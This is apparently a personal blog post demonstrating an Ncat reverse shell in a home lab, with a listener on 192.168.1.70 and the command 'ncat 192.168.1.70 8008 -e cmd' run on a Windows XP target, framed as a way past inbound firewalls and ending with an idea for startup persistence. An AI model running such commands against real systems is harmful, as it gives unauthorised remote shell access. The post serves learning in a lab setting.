This will probably be my last Ncat post for now as I really must get on with other things. If you want a comprehensive Ncat tutorial then hop over to IronGeek. Ncat really is a superb tool.
Previous posts have focussed on connecting to Ncap from a remote machine and although great fun, in the real world, the connection would likely be blocked by a firewall. One way around this is to create a reverse shell in which the target machine is reaching out to us. Obviously outbound connections are less regulated than inbound.
First we set up the Ncap ‘listerner’ on my machine (IP 192.168.1.70)
:~# ncat -l 8008 <– Listen on port 8008
Then the reverse shell on the target Windows machine:
C:\Documents and Settings\Lab1> ncat 192.168.1.70 8008 -e cmd <– Connect to IP 192.168.1.70 on port 8008 and execute command shell
Result on my machine:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\Lab1>
Job done.
I wonder if it is possible to have Ncat run a reverse shell on startup similar to the backdoor example I blogged?